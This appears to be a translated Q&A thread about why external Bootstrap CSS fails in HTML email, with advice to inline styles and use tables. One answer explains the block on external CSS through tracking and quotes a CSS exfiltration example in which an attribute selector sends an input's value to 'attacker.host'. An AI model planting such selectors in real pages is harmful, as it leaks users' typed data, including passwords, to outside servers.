我已经完成了Html格式的电子邮件系统。。。所以在那里我可以用html格式发送电子邮件。。带有内部CSS
现在我已经用外部引导CSS做了同样的操作。。
那边的CSS不见了。因此,我使用外部引导css这是我的外部css链接
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">
然而,当我将外部引导CSS作为Html页面运行时,它正在加载。
但它在电子邮件中不起作用
请就此事向我提出建议。。
- 首先,你不能从CDN或任何地方链接外部CSS
- 但是你可以从外部插入图像
- 你必须在html中编写CSS规则
- 并且您不能在电子邮件模板html代码中使用divs
- 您必须使用html表来构建模板的结构
有关更多电子邮件模板指南:http://earthintegrate.com/guidelines-for-creating-an-html-email-template/
祝你好运!
Srivin Prabhash
Gmail将剥离<head>
中的所有内容,这就是他们的做法。
您可以使用类似mailchips的内联css生成器这样的服务,为您生成所有的内联代码。
阻止外部CSS的原因是它提供了与跟踪像素相同的跟踪功能——给定的电子邮件从远程服务器请求数据,以便能够呈现页面。因此,没有一个合理的电子邮件客户端会允许您使用不受控制的CSS外部链接。
这种滥用CSS的行为可以被视为一个完整的CSS键盘记录程序的长度,这在Mike Gualtieri的帖子中进行了详细讨论。
引用Mike:
CSS Exfil攻击围绕CSS"值选择器"展开,该选择器可用于解析HTML标记属性数据。
这个简单的例子展示了这些选择器是如何被滥用的:
<style>
#username[value="mikeg"] {
background:url("https://attacker.host/mikeg");
}
</style>
<input id="username" value="mikeg" />
在上面的例子中,当HTML/CSS在web浏览器中呈现时,在攻击者控制的远程主机上加载了一个背景图像,表明输入的值为"mikeg"。为了使攻击更加有用,需要额外的文本解析。以下是几个概念验证漏洞,展示了潜在攻击的种类、范围和严重性。
正如Hacker新闻线程中提到的,谨慎的做法是让密码输入完全不受控制,即让浏览器根据用户输入更新DOM